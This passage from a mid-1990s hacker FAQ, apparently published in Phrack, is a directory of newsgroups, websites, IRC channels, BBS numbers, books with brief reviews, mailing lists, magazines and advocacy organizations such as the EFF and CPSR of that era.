  9091.   comp.dcom.telecom       Telecommunications digest (Moderated)
  9092.   comp.dcom.telecom.tech  [no description available]
  9093.   comp.org.cpsr.announce  Computer Professionals for Social Responsibility
  9094.   comp.org.cpsr.talk      Issues of computing and social responsibility
  9095.   comp.org.eff.news       News from the Electronic Frontiers Foundation
  9096.   comp.org.eff.talk       Discussion of EFF goals, strategies, etc.
  9097.   comp.protocols.kerberos The Kerberos authentification server
  9098.   comp.protocols.tcp-ip   TCP and IP network protocols
  9099.   comp.risks              Risks to the public from computers & users
  9100.   comp.security.announce  Announcements from the CERT about security
  9101.   comp.security.misc      Security issues of computers and networks
  9102.   comp.security.unix      Discussion of Unix security
  9103.   comp.virus              Computer viruses & security (Moderated)
  9104.   de.org.ccc              Mitteilungen des CCC e.V.
  9105.   misc.security           Security in general, not just computers (Moderated)
  9106.   rec.pyrotechnics        Fireworks, rocketry, safety, & other topics
  9107.   rec.radio.scanner       [no description available]
  9108.   rec.video.cable-tv      Technical and regulatory issues of cable television
  9109.   sci.crypt               Different methods of data en/decryption
  9110.  
  9111.  
  9112. 04. What are some telnet sites of interest to hackers?
  9113.  
  9114.   ntiabbs.ntia.doc.gov                  (NTIA)
  9115.   telnet lust.isca.uiowa.edu 2600       (underground bbs) (temporarily down)
  9116.  
  9117.  
  9118.                               ==Phrack Magazine==
  9119.  
  9120.                  Volume Six, Issue Forty-Seven, File 8 of 22
  9121.  
  9122.  
  9123. 05. What are some gopher sites of interest to hackers?
  9124.  
  9125.   ba.com                  (Bell Atlantic)
  9126.   csrc.ncsl.nist.gov      (NIST Security Gopher)
  9127.   gopher.acm.org          (SIGSAC (Security, Audit & Control))
  9128.   gopher.cpsr.org         (Computer Professionals for Social Responsibility)
  9129.   gopher.cs.uwm.edu
  9130.   gopher.eff.org          (Electonic Frontier Foundation)
  9131.   gw.PacBell.com          (Pacific Bell)
  9132.   iitf.doc.gov            (NITA -- IITF)
  9133.   oss.net                 (Open Source Solutions)
  9134.   spy.org                 (Computer Systems Consulting)
  9135.   wiretap.spies.com       (Wiretap)
  9136.  
  9137.  
  9138. 06. What are some World wide Web (WWW) sites of interest to hackers?
  9139.  
  9140.   http://alumni.caltech.edu/~dank/isdn/           (ISDN)
  9141.   http://aset.rsoc.rockwell.com                   (NASA/MOD AIS Security)
  9142.   http://aset.rsoc.rockwell.com/exhibit.html      (Tech. for Info Sec)
  9143.   http://att.net/dir800                           (800 directory)
  9144.   http://ausg.dartmouth.edu/security.html         (Security)
  9145.   http://cs.purdue.edu/coast/coast.html           (Coast)
  9146.   http://csrc.ncsl.nist.gov                       (NIST)
  9147.   http://dhp.com/~pluvius
  9148.   http://dfw.net/~aleph1                          (Eubercrackers)
  9149.   http://draco.centerline.com:8080/~franl/crypto.html (Crypto)
  9150.   http://everest.cs.ucdavis.edu/Security.html     (Security)
  9151.   http://everest.cs.ucdavis.edu/slides/slides.html(Security Lab Slides)
  9152.   http://ezinfo.ethz.ch/ETH/D-REOK/fsk/fsk_homepage.html  (CSSCR)
  9153.   http://first.org                                (FIRST)
  9154.   http://ftp.tamu.edu/~abr8030/security.html      (Security)
  9155.   http://hightop.nrl.navy.mil/potpourri.html      (Security)
  9156.   http://hightop.nrl.navy.mil/rainbow.html        (Rainbow Books)
  9157.   http://ice-www.larc.nasa.gov/ICE/papers/hacker-crackdown.html (Sterling)
  9158.   http://ice-www.larc.nasa.gov/ICE/papers/nis-requirements.html (ICE NIS)
  9159.   http://info.bellcore.com/BETSI/betsi.html       (Betsi)
  9160.   http://infosec.nosc.mil/infosec.html            (SPAWAR INFOSEC)
  9161.   http://l0pht.com                                (The l0pht)
  9162.   http://l0pht.com/~oblivion/IIRG.html            (Phantasy Magazine)
  9163.   http://mindlink.jolt.com                        (The Secrets of LockPicking)
  9164.   http://mls.saic.com                             (SAIC MLS)
  9165.   http://naic.nasa.gov/fbi/FBI_homepage.html      (FBI Homepage)
  9166.   http://nasirc.hq.nasa.gov                       (NASA ASIRC)
  9167.   http://ophie.hughes.american.edu/~ophie
  9168.   http://ripco.com:8080/~glr/glr.html             (Full Disclosure)
  9169.   http://spy.org                                  (CSC)
  9170.   http://tansu.com.au/Info/security.html          (Comp and Net Security)
  9171.   http://the-tech.mit.edu                         (LaMacchia case info)
  9172.   http://wintermute.itd.nrl.navy.mil/5544.html    (Network Security)
  9173.   http://www.aads.net                             (Ameritech)
  9174.   http://www.alw.nih.gov/WWW/security.html        (Unix Security)
  9175.   http://www.artcom.de/CCC                        (CCC Homepage)
  9176.   http://www.aspentec.com/~frzmtdb/fun/hacker.html
  9177.   http://www.aus.xanadu.com:70/1/EFA              (EFF Australia)
  9178.   http://www.ba.com                               (Bell Atlantic)
  9179.   http://www.beckman.uiuc.edu/groups/biss/VirtualLibrary/xsecurity.html(X-Win)
  9180.   http://www.bell.com                             (MFJ Task Force)
  9181.   http://www.bellcore.com/SECURITY/security.html  (Bellcore Security Products)
  9182.   http://www.brad.ac.uk/~nasmith/index.html
  9183.   http://www.bst.bls.com                          (BellSouth)
  9184.   http://www.c3.lanl.gov/~mcn                     (Lanl)
  9185.   http://www.cert.dfn.de/                         (German First Team)
  9186.   http://www.commerce.net/information/standards/drafts/shttp.txt (HyperText)
  9187.   http://www.contrib.andrew.cmu.edu:8001/usr/dscw/home.html
  9188.   http://www.cpsr.org/home                        (CPSR)
  9189.   http://www.cs.tufts.edu/~mcable/cypher/alerts/alerts.html (Cypherpunk)
  9190.   http://www.cs.tufts.edu/~mcable/HackerCrackdown (Hacker Crackdown)
  9191.   http://www.cs.umd.edu/~lgas
  9192.   http://www.cs.cmu.edu:8001/afs/cs.cmu.edu/user/bsy/www/sec.html (Security)
  9193.   http://www.csd.harris.com/secure_info.html      (Harris)
  9194.   http://www.csl.sri.com                          (SRI Computer Science Lab)
  9195.   http://www.cybercafe.org/cybercafe/pubtel/pubdir.html (CyberCafe)
  9196.   http://www.datafellows.fi                       (Data Fellows)
  9197.   http://www.delmarva.com/raptor/raptor.html      (Raptor Network Isolator)
  9198.   http://www.demon.co.uk/kbridge                  (KarlBridge)
  9199.   http://www.digicash.com/ecash/ecash-home.html   (Digital Cash)
  9200.   http://www.digital.com/info/key-secure-index.html(Digital Secure Systems)
  9201.   http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html(Bugtraq)
  9202.   http://www.eecs.nwu.edu/~jmyers/ids/index.html  (Intrusion Detection Systems)
  9203.   http://www.eff.org/papers.html                  (EFF)
  9204.   http://www.engin.umich.edu/~jgotts/boxes.html   (Box info)
  9205.   http://www.engin.umich.edu/~jgotts/hack-faq.html(This document)
  9206.   http://www.engin.umich.edu/~jgotts/underground.html
  9207.   http://www.ensta.fr/internet/unix/sys_admin     (System administration)
  9208.   http://www.etext.org/Zines/                     (Zines)
  9209.   http://www.fc.net/defcon                        (DefCon)
  9210.   http://www.fc.net/phrack.html                   (Phrack Magazine)
  9211.   http://www.first.org/first/                     (FIRST)
  9212.   http://www.greatcircle.com                      (Great Circle Associates)
  9213.   http://www.hpcc.gov/blue94/section.4.6.html     (NSA)
  9214.   http://www.ic.gov                               (The CIA)
  9215.   http://www.lerc.nasa.gov/Unix_Team/Dist_Computing_Security.html (Security)
  9216.   http://www.lysator.liu.se:7500/terror/thb_title.html (Terrorists Handbook)
  9217.   http://www.lysator.liu.se:7500/mit-guide/mit-guide.html (Lockpicking Guide)
  9218.   http://www.net23.com                            (Max Headroom)
  9219.   http://www.nist.gov                             (NIST)
  9220.   http://www.pacbell.com                          (Pacific Bell)
  9221.   http://www.paranoia.com/mthreat                 (ToneLoc)
  9222.   http://www.pegasus.esprit.ec.org/people/arne/pgp.html (PGP)
  9223.   http://www.phantom.com/~king                    (Taran King)
  9224.   http://www.quadralay.com/www/Crypt/Crypt.html   (Quadralay Cryptography)
  9225.   http://www.qualcomm.com/cdma/wireless.html      (Qualcomm CDMA)
  9226.   http://www.research.att.com                     (AT&T)
  9227.   http://ripco.com:8080/~glr/glr.html             (Full Disclosure)
  9228.   http://www.rsa.com                              (RSA Data Security)
  9229.   http://www.satelnet.org/~ccappuc
  9230.   http://www.service.com/cm/uswest/usw1.html      (USWest)
  9231.   http://www.shore.net/~oz/welcome.html           (Hack TV)
  9232.   http://www.spy.org                              (Computer Systems Consulting)
  9233.   http://www.sri.com                              (SRI)
  9234.   http://www.tansu.com.au/Info/security.html      (Security Reference Index)
  9235.   http://www.tis.com                              (Trusted Information Systems)
  9236.   http://www.tri.sbc.com                          (Southwestern Bell)
  9237.   http://www.uci.agh.edu.pl/pub/security          (Security)
  9238.   http://www.umcc.umich.edu/~doug/virus-faq.html  (Virus)
  9239.   http://www.usfca.edu/crackdown/crack.html       (Hacker Crackdown)
  9240.   http://www.wam.umd.edu/~ankh/Public/devil_does_unix
  9241.   http://www.wiltel.com                           (Wiltel)
  9242.   http://www.winternet.com/~carolann/dreams.html
  9243.   http://www.wired.com                            (Wired Magazine)
  9244.  
  9245.  
  9246. 07. What are some IRC channels of interest to hackers?
  9247.  
  9248.   #2600
  9249.   #cellular
  9250.   #hack
  9251.   #phreak
  9252.   #linux
  9253.   #realhack
  9254.   #root
  9255.   #unix
  9256.   #warez
  9257.  
  9258.  
  9259. 08. What are some BBS's of interest to hackers?
  9260.  
  9261.   Rune Stone              (203)832-8441
  9262.   Hacker's Haven          (303)343-4053
  9263.   Independent Nation      (315)656-4179
  9264.   Ut0PiA                  (315)656-5135
  9265.   underworld_1994.com     (514)683-1894
  9266.   Digital Fallout         (516)378-6640
  9267.   Alliance Communications (612)251-8596
  9268.   Maas-Neotek             (617)855-2923
  9269.   Apocalypse 2000         (708)676-9855
  9270.   K0dE Ab0dE              (713)579-2276
  9271.   fARM R0Ad 666           (713)855-0261
  9272.   
  9273.  
  9274. 09. What are some books of interest to hackers?
  9275.  
  9276. General Computer Security
  9277. ~~~~~~~~~~~~~~~~~~~~~~~~~
  9278.   Computer Security Basics
  9279.   Author: Deborah Russell and G.T. Gengemi Sr.
  9280.   Publisher: O'Reilly & Associates, Inc.
  9281.   Copyright Date: 1991
  9282.   ISBN: 0-937175-71-4
  9283.  
  9284.         This is an excellent book.  It gives a broad overview of
  9285.         computer security without sacrificing detail.  A must read for
  9286.         the beginning security expert.
  9287.  
  9288.   Computer Security Management
  9289.   Author: Karen Forcht
  9290.   Publisher: Boyd and Fraser
  9291.   Copyright Date: 1994
  9292.   ISBN: 0-87835-881-1
  9293.  
  9294.   Information Systems Security
  9295.   Author: Philip Fites and Martin Kratz
  9296.   Publisher: Van Nostrad Reinhold
  9297.   Copyright Date: 1993
  9298.   ISBN: 0-442-00180-0
  9299.  
  9300.   Computer Related Risks
  9301.   Author: Peter G. Neumann
  9302.   Publisher: Addison-Wesley
  9303.   Copyright Date: 1995
  9304.   ISBN: 0-201-55805-X
  9305.  
  9306.   Computer Security Management
  9307.   Author: Karen Forcht
  9308.   Publisher: boyd & fraser publishing company
  9309.   Copyright Date: 1994
  9310.   ISBN: 0-87835-881-1
  9311.  
  9312.   The Stephen Cobb Complete Book of PC and LAN Security
  9313.   Author: Stephen Cobb
  9314.   Publisher: Windcrest Books
  9315.   Copyright Date: 1992
  9316.   ISBN: 0-8306-9280-0 (hardback) 0-8306-3280-8 (paperback)
  9317.  
  9318.   Security in Computing
  9319.   Author: Charles P. Pfleeger
  9320.   Publisher: Prentice Hall
  9321.   Copyright Date: 1989
  9322.   ISBN: 0-13-798943-1.
  9323.  
  9324.   Building a Secure Computer System
  9325.   Author: Morrie Gasser
  9326.   Publisher: Van Nostrand Reinhold Co., New York.
  9327.   Copyright Date:
  9328.   ISBN: 0-442-23022-2
  9329.  
  9330.   Modern Methods for Computer Security
  9331.   Author: Lance Hoffman
  9332.   Publisher: Prentice Hall
  9333.   Copyright Date: 1977
  9334.   ISBN:
  9335.  
  9336.   Windows NT 3.5 Guidelines for Security, Audit and Control
  9337.   Author:
  9338.   Publisher: Microsoft Press
  9339.   Copyright Date:
  9340.   ISBN: 1-55615-814-9
  9341.  
  9342.  
  9343. Unix System Security
  9344. ~~~~~~~~~~~~~~~~~~~~
  9345.   Practical Unix Security
  9346.   Author: Simson Garfinkel and Gene Spafford
  9347.   Publisher: O'Reilly & Associates, Inc.
  9348.   Copyright Date: 1991
  9349.   ISBN: 0-937175-72-2
  9350.  
  9351.         Finally someone with a very firm grasp of Unix system security
  9352.         gets down to writing a book on the subject.  Buy this book.
  9353.         Read this book.
  9354.  
  9355.   Firewalls and Internet Security
  9356.   Author: William Cheswick and Steven Bellovin
  9357.   Publisher: Addison Wesley
  9358.   Copyright Date: 1994
  9359.   ISBN: 0-201-63357-4
  9360.  
  9361.   Unix System Security
  9362.   Author: Rik Farrow
  9363.   Publisher: Addison Wesley
  9364.   Copyright Date: 1991
  9365.   ISBN: 0-201-57030-0
  9366.  
  9367.   Unix Security: A Practical Tutorial
  9368.   Author: N. Derek Arnold
  9369.   Publisher: McGraw Hill
  9370.   Copyright Date: 1993
  9371.   ISBN: 0-07-002560-6
  9372.  
  9373.   Unix System Security: A Guide for Users and Systems Administrators
  9374.   Author: David A. Curry
  9375.   Publisher: Addison-Wesley
  9376.   Copyright Date: 1992
  9377.   ISBN: 0-201-56327-4
  9378.  
  9379.   Unix System Security
  9380.   Author: Patrick H. Wood and Stephen G. Kochan
  9381.   Publisher: Hayden Books
  9382.   Copyright Date: 1985
  9383.   ISBN: 0-672-48494-3
  9384.  
  9385.   Unix Security for the Organization
  9386.   Author: Richard Bryant
  9387.   Publisher: Sams
  9388.   Copyright Date: 1994
  9389.   ISBN: 0-672-30571-2
  9390.  
  9391.  
  9392. Network Security
  9393. ~~~~~~~~~~~~~~~~
  9394.   Network Security Secrets
  9395.   Author: David J. Stang and Sylvia Moon
  9396.   Publisher: IDG Books
  9397.   Copyright Date: 1993
  9398.   ISBN: 1-56884-021-7
  9399.  
  9400.         Not a total waste of paper, but definitely not worth the
  9401.         $49.95 purchase price.  The book is a rehash of previously
  9402.         published information.  The only secret we learn from reading
  9403.         the book is that Sylvia Moon is a younger woman madly in love
  9404.         with the older David Stang.
  9405.  
  9406.   Complete Lan Security and Control
  9407.   Author: Peter Davis
  9408.   Publisher: Windcrest / McGraw Hill
  9409.   Copyright Date: 1994
  9410.   ISBN: 0-8306-4548-9 and 0-8306-4549-7
  9411.  
  9412.   Network Security
  9413.   Author: Steven Shaffer and Alan Simon
  9414.   Publisher: AP Professional
  9415.   Copyright Date: 1994
  9416.   ISBN: 0-12-638010-4
  9417.  
  9418.  
  9419. Cryptography
  9420. ~~~~~~~~~~~~
  9421.   Applied Cryptography: Protocols, Algorithms, and Source Code in C
  9422.   Author: Bruce Schneier
  9423.   Publisher: John Wiley & Sons
  9424.   Copyright Date: 1994
  9425.   ISBN: 0-471-59756-2
  9426.  
  9427.         Bruce Schneier's book replaces all other texts on
  9428.         cryptography.  If you are interested in cryptography, this is
  9429.         a must read.  This may be the first and last book on
  9430.         cryptography you may ever need to buy.
  9431.  
  9432.   Cryptography and Data Security
  9433.   Author: Dorothy Denning
  9434.   Publisher: Addison-Wesley Publishing Co.
  9435.   Copyright Date: 1982
  9436.   ISBN: 0-201-10150-5
  9437.  
  9438.   Protect Your Privacy: A Guide for PGP Users
  9439.   Author: William Stallings
  9440.   Publisher: Prentice-Hall
  9441.   Copyright Date: 1994
  9442.   ISBN: 0-13-185596-4
  9443.  
  9444.  
  9445. Programmed Threats
  9446. ~~~~~~~~~~~~~~~~~~
  9447.   The Little Black Book of Computer Viruses
  9448.   Author: Mark Ludwig
  9449.   Publisher: American Eagle Publications
  9450.   Copyright Date: 1990
  9451.   ISBN: 0-929408-02-0
  9452.  
  9453.         The original, and still the best, book on computer viruses.
  9454.         No media hype here, just good clean technical information.
  9455.  
  9456.   Computer Viruses, Artificial Life and Evolution
  9457.   Author: Mark Ludwig
  9458.   Publisher: American Eagle Publications
  9459.   Copyright Date: 1993
  9460.   ISBN: 0-929408-07-1
  9461.  
  9462.   Computer Viruses, Worms, Data Diddlers, Killer Programs, and Other
  9463.         Threats to Your System
  9464.   Author: John McAfee and Colin Haynes
  9465.   Publisher: St. Martin's Press
  9466.   Copyright Date: 1989
  9467.   ISBN: 0-312-03064-9 and 0-312-02889-X
  9468.  
  9469.   The Virus Creation Labs: A Journey Into the Underground
  9470.   Author: George Smith
  9471.   Publisher: American Eagle Publications
  9472.   Copyright Date: 1994
  9473.   ISBN:
  9474.  
  9475.  
  9476. Telephony
  9477. ~~~~~~~~~
  9478.   Engineering and Operations in the Bell System
  9479.   Author: R.F. Rey
  9480.   Publisher: Bell Telephont Laboratories
  9481.   Copyright Date: 1983
  9482.   ISBN: 0-932764-04-5
  9483.  
  9484.         Although hopelessly out of date, this book remains *THE* book
  9485.         on telephony.  This book is 100% Bell, and is loved by phreaks
  9486.         the world over.
  9487.  
  9488.   Telephony: Today and Tomorrow
  9489.   Author: Dimitris N. Chorafas
  9490.   Publisher: Prentice-Hall
  9491.   Copyright Date: 1984
  9492.   ISBN: 0-13-902700-9
  9493.  
  9494.   The Telecommunications Fact Book and Illustrated Dictionary
  9495.   Author: Ahmed S. Khan
  9496.   Publisher: Delmar Publishers, Inc.
  9497.   Copyright Date: 1992
  9498.   ISBN: 0-8273-4615-8
  9499.  
  9500.         I find this dictionary to be an excellent reference book on
  9501.         telephony, and I recommend it to anyone with serious
  9502.         intentions in the field.
  9503.  
  9504.   Tandy/Radio Shack Cellular Hardware
  9505.   Author: Judas Gerard and Damien Thorn
  9506.   Publisher: Phoenix Rising Communications
  9507.   Copyright Date: 1994
  9508.   ISBN:
  9509.  
  9510.   The Phone Book
  9511.   Author: Carl Oppendahl
  9512.   Publisher: Consumer Reports
  9513.   Copyright Date:
  9514.   ISBN: 0-89043-364-x
  9515.  
  9516.         Listing of every cellular ID in the us, plus roaming ports,
  9517.         and info numbers for each carrier.
  9518.  
  9519.   Principles of Caller I.D.
  9520.   Author:
  9521.   Publisher: International MicroPower Corp.
  9522.   Copyright Date:
  9523.   ISBN:
  9524.  
  9525.  
  9526. Hacking History and Culture
  9527. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  9528.   The Hacker Crackdown: Law and Disorder on the Electronic Frontier
  9529.   Author: Bruce Sterling
  9530.   Publisher: Bantam Books
  9531.   Copyright Date: 1982
  9532.   ISBN: 0-553-56370-X
  9533.  
  9534.         Bruce Sterling has recently released the book FREE to the net.
  9535.         The book is much easier to read in print form, and the
  9536.         paperback is only $5.99.  Either way you read it, you will be
  9537.         glad you did.  Mr. Sterling is an excellent science fiction
  9538.         author and has brought his talent with words to bear on the
  9539.         hacking culture.  A very enjoyable reading experience.
  9540.  
  9541.   Cyberpunk
  9542.   Author: Katie Hafner and John Markoff
  9543.   Publisher: Simon and Schuster
  9544.   Copyright Date: 1991
  9545.   ISBN: 0-671-77879-X
  9546.  
  9547.   The Cuckoo's Egg
  9548.   Author: Cliff Stoll
  9549.   Publisher: Simon and Schuster
  9550.   Copyright Date: 1989
  9551.   ISBN: 0-671-72688-9
  9552.  
  9553.   Hackers: Heroes of the Computer Revolution
  9554.   Author: Steven Levy
  9555.   Publisher: Doubleday
  9556.   Copyright Date: 1984
  9557.   ISBN: 0-440-13495-6
  9558.  
  9559.  
  9560. Unclassified
  9561. ~~~~~~~~~~~~
  9562.   The Hacker's Handbook
  9563.   Author: Hugo Cornwall
  9564.   Publisher: E. Arthur Brown Company
  9565.   Copyright Date:
  9566.   ISBN: 0-912579-06-4
  9567.  
  9568.   Secrets of a Super Hacker
  9569.   Author: The Knightmare
  9570.   Publisher: Loompanics
  9571.   Copyright Date: 1994
  9572.   ISBN: 1-55950-106-5
  9573.  
  9574.         The Knightmare is no super hacker.  There is little or no real
  9575.         information in this book.  The Knightmare gives useful advice
  9576.         like telling you not to dress up before going trashing.
  9577.         The Knightmare's best hack is fooling Loompanics into
  9578.         publishing this garbage.
  9579.  
  9580.   The Day The Phones Stopped
  9581.   Author: Leonard Lee
  9582.   Publisher: Primus / Donald I Fine, Inc.
  9583.   Copyright Date: 1992
  9584.   ISBN: 1-55611-286-6
  9585.  
  9586.         Total garbage.  Paranoid delusions of a lunatic.  Less factual
  9587.         data that an average issue of the Enquirer.
  9588.  
  9589.   Information Warfare
  9590.   Author: Winn Swartau
  9591.   Publisher: Thunder Mountain Press
  9592.   Copyright Date: 1994
  9593.   ISBN: 1-56025-080-1
  9594.  
  9595.   An Illustrated Guide to the Techniques and Equipment of Electronic Warfare
  9596.   Author: Doug Richardson
  9597.   Publisher: Salamander Press
  9598.   Copyright Date:
  9599.   ISBN: 0-668-06497-8
  9600.  
  9601.  
  9602. 10. What are some videos of interest to hackers?
  9603.  
  9604.   'Unauthorized Access' by Annaliza Savage
  9605.   $25 on VH S format in 38-min
  9606.   Savage Productions
  9607.   1803 Mission St., #406
  9608.   Santa Cruz, CA 95060
  9609.  
  9610.  
  9611. 11. What are some mailing lists of interest to hackers?
  9612.  
  9613.   Academic Firewalls
  9614.   Reflector Address:
  9615.   Registration Address: Send a message to majordomo@greatcircle.com
  9616.                         containing the line "subscribe firewalls user@host"
  9617.  
  9618.   Bugtraq
  9619.   Reflector Address:    bugtraq@fc.net
  9620.   Registration Address: bugtraq-request@fc.net
  9621.  
  9622.   Cert Tools
  9623.   Reflector Address:    cert-tools@cert.org
  9624.   Registration Address: cert-tools-request@cert.org
  9625.  
  9626.   Computers and Society
  9627.   Reflector Address:    Comp-Soc@limbo.intuitive.com
  9628.   Registration Address: taylor@limbo.intuitive.com
  9629.  
  9630.   Coordinated Feasibility Effort to Unravel State Data
  9631.   Reflector Address:    ldc-sw@cpsr.org
  9632.   Registration Address:
  9633.  
  9634.   CPSR Announcement List
  9635.   Reflector Address:    cpsr-announce@cpsr.org
  9636.   Registration Address:
  9637.  
  9638.   CPSR - Intellectual Property
  9639.   Reflector Address:    cpsr-int-prop@cpsr.org
  9640.   Registration Address:
  9641.  
  9642.   CPSR - Internet Library
  9643.   Reflector Address:    cpsr-library@cpsr.org
  9644.   Registration Address:
  9645.  
  9646.   DefCon Announcement List
  9647.   Reflector Address:
  9648.   Registration Address: Send a message to majordomo@fc.net containing
  9649.                         the line "subscribe dc-announce"
  9650.  
  9651.   DefCon Chat List
  9652.   Reflector Address:
  9653.   Registration Address: Send a message to majordomo@fc.net containing
  9654.                         the line "subscribe dc-stuff"
  9655.  
  9656.   IDS (Intruder Detection Systems)
  9657.   Reflector Address:
  9658.   Registration Address: Send a message to majordomo@wyrm.cc.uow.edu.au
  9659.                         containing the line "subscribe ids"
  9660.  
  9661.   Macintosh Security
  9662.   Reflector Address:    mac-security@eclectic.com
  9663.   Registration Address: mac-security-request@eclectic.com
  9664.  
  9665.   NeXT Managers
  9666.   Reflector Address:
  9667.   Registration Address: next-managers-request@stolaf.edu
  9668.  
  9669.   Phiber-Scream
  9670.   Reflector Address:
  9671.   Registration Address: Send a message to listserv@netcom.com
  9672.                         containing the line "subscribe phiber-scream user@host"
  9673.  
  9674.   phruwt-l (Macintosh H/P)
  9675.   Reflector Address:
  9676.   Registration Address: Send a message to filbert@netcom.com
  9677.                         with the subject "phruwt-l"
  9678.  
  9679.   rfc931-users
  9680.   Reflector Address:    rfc931-users@kramden.acf.nyu.edu
  9681.   Registration Address: brnstnd@nyu.edu
  9682.  
  9683.   RSA Users
  9684.   Reflector Address:    rsaref-users@rsa.com
  9685.   Registration Address: rsaref-users-request@rsa.com
  9686.  
  9687.  
  9688. 12. What are some print magazines of interest to hackers?
  9689.  
  9690. 2600 - The Hacker Quarterly
  9691. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  9692. E-mail address: 2600@well.sf.ca.us
  9693.  
  9694. Subscription Address: 2600 Subscription Dept
  9695.                       PO Box 752
  9696.                       Middle Island, NY  11953-0752
  9697.  
  9698. Letters and article submission address: 2600 Editorial Dept
  9699.                                         PO Box 99
  9700.                                         Middle Island, NY  11953-0099
  9701.  
  9702. Subscriptions: United States: $21/yr individual, $50 corporate.
  9703.                Overseas: $30/yr individual, $65 corporate.
  9704.  
  9705.  
  9706. Gray Areas
  9707. ~~~~~~~~~~
  9708. Gray Areas examines gray areas of law and morality and subject matter
  9709. which is illegal, immoral and/oe controversial. Gray Areas explores
  9710. why hackers hack and puts hacking into a sociological framework of
  9711. deviant behavior.
  9712.  
  9713. E-Mail Address: grayarea@well.sf.ca.us
  9714. E-Mail Address: grayarea@netaxs.com
  9715.  
  9716. U.S. Mail Address: Gray Areas
  9717.                    PO Box 808
  9718.                    Broomall, PA 19008
  9719.  
  9720. Subscriptions: $26.00 4 issues first class
  9721.                $34.00 4 issues foreign (shipped air mail)
  9722.  
  9723.  
  9724. Wired
  9725. ~~~~~
  9726. Subscription Address: subscriptions@wired.com
  9727.                   or: Wired
  9728.                       PO Box 191826
  9729.                       San Francisco, CA 94119-9866
  9730.  
  9731. Letters and article submission address: guidelines@wired.com
  9732.                                     or: Wired
  9733.                                         544 Second Street
  9734.                                         San Francisco, CA 94107-1427
  9735.  
  9736. Subscriptions: $39/yr (US) $64/yr (Canada/Mexico) $79/yr (Overseas)
  9737.  
  9738.  
  9739. Nuts & Volts
  9740. ~~~~~~~~~~~~
  9741. T& L Publications
  9742. 430 Princeland Court
  9743. Corona, CA 91719
  9744. (800)783-4624 (Voice) (Subscription Only Order Line)
  9745. (909)371-8497 (Voice)
  9746. (909)371-3052 (Fax)
  9747. CIS: 74262,3664
  9748.  
  9749.  
  9750. 13. What are some e-zines of interest to hackers?
  9751.  
  9752. CoTNo: Communications of The New Order    ftp.etext.org  /pub/Zines/CoTNo
  9753. Empire Times                              ftp.etext.org  /pub/Zines/Emptimes
  9754. Phrack                                    ftp.fc.net     /pub/phrack
  9755.  
  9756.  
  9757. 14. What are some organizations of interest to hackers?
  9758.  
  9759. Computer Professionals for Social Responsibility (CPSR)
  9760. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  9761. CPSR empowers computer professionals and computer users to advocate
  9762. for the responsible use of information technology and empowers all who
  9763. use computer technology to participate in the public debate.   As
  9764. technical experts, CPSR members provide the public and policymakers
  9765. with realistic assessments of the power, promise, and limitations of
  9766. computer technology.  As an organization of concerned citizens, CPSR
  9767. directs public attention to critical choices concerning the
  9768. applications of computing and how those choices affect society.
  9769.  
  9770. By matching unimpeachable technical information with policy
  9771. development savvy, CPSR uses minimum dollars to have maximum impact
  9772. and encourages broad public participation in the shaping of technology
  9773. policy.
  9774.  
  9775. Every project we undertake is based on five principles:
  9776.  
  9777. *  We foster and support public discussion of and public
  9778.    responsibility for decisions involving the use of computers in
  9779.    systems critical to society.
  9780.  
  9781. *  We work to dispel popular myths about the infallibility of
  9782.    technological systems.
  9783.  
  9784. *  We challenge the assumption that technology alone can solve
  9785.    political and social problems.
  9786.  
  9787. *  We critically examine social and technical issues within the
  9788.    computer profession, nationally and internationally.
  9789.  
  9790. *  We encourage the use of computer technology to improve the quality
  9791.    of life.
  9792.  
  9793. CPSR Membership Categories
  9794.   75  REGULAR MEMBER
  9795.   50  Basic member
  9796.  200  Supporting member
  9797.  500  Sponsoring member
  9798. 1000  Lifetime member
  9799.   20  Student/low income member
  9800.   50  Foreign subscriber
  9801.   50  Library/institutional subscriber
  9802.  
  9803. CPSR National Office
  9804. P.O. Box 717
  9805. Palo Alto, CA  94301
  9806. 415-322-3778
  9807. 415-322-3798 (FAX)
  9808. E-mail: cpsr@csli.stanford.edu
  9809.  
  9810.  
  9811. Electronic Frontier Foundation (EFF)
  9812. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  9813. The Electronic Frontier Foundation (EFF) is dedicated to the pursuit
  9814. of policies and activities that will advance freedom and openness in
  9815. computer-based communications. It is a member-supported, nonprofit
  9816. group that grew from the conviction that a new public interest
  9817. organization was needed in the information age; that this organization
  9818. would enhance and protect the democratic potential of new computer
  9819. communications technology. From the beginning, the EFF determined to
  9820. become an organization that would combine technical, legal, and public
  9821. policy expertise, and would apply these skills to the myriad issues
  9822. and concerns that arise whenever a new communications medium is born.
  9823.  
  9824. Memberships are $20.00 per year for students, $40.00 per year for
  9825. regular members, and $100.00 per year for organizations.
  9826.  
  9827. The Electronic Frontier Foundation, Inc.
  9828. 666 Pennsylvania Avenue S.E., Suite 303
  9829. Washington, D.C.  20003
  9830. +1 202 544 9237
  9831. +1 202 547 5481 FAX
  9832. Internet: eff@eff.org
  9833.  
  9834.  
  9835. Free Software Foundation (FSF)
  9836. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  9837.  
  9838.  
  9839. GNU
  9840. ~~~
  9841.  
  9842.  
  9843. The League for Programming Freedom (LPF)
  9844. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  9845. The League for Programming Freedom is an organization of people who
  9846. oppose the attempt to monopolize common user interfaces through "look
  9847. and feel" copyright lawsuits.  Some of us are programmers, who worry
  9848. that such monopolies will obstruct our work.  Some of us are users,
  9849. who want new computer systems to be compatible with the interfaces we
  9850. know.  Some are founders of hardware or software companies, such as
  9851. Richard P. Gabriel. Some of us are professors or researchers,
  9852. including John McCarthy, Marvin Minsky, Guy L. Steele, Jr., Robert S.
  9853. Boyer and Patrick Winston.
  9854.  
  9855. "Look and feel" lawsuits aim to create a new class of government-
  9856. enforced monopolies broader in scope than ever before.  Such a system
  9857. of user-interface copyright would impose gratuitous incompatibility,
  9858. reduce competition, and stifle innovation.
  9859.  
  9860. We in the League hope to prevent these problems by preventing
  9861. user-interface copyright.  The League is NOT opposed to copyright law
  9862. as it was understood until 1986 -- copyright on particular programs.
  9863. Our aim is to stop changes in the copyright system which would take
  9864. away programmers' traditional freedom to write new programs compatible
  9865. with existing programs and practices.
  9866.  
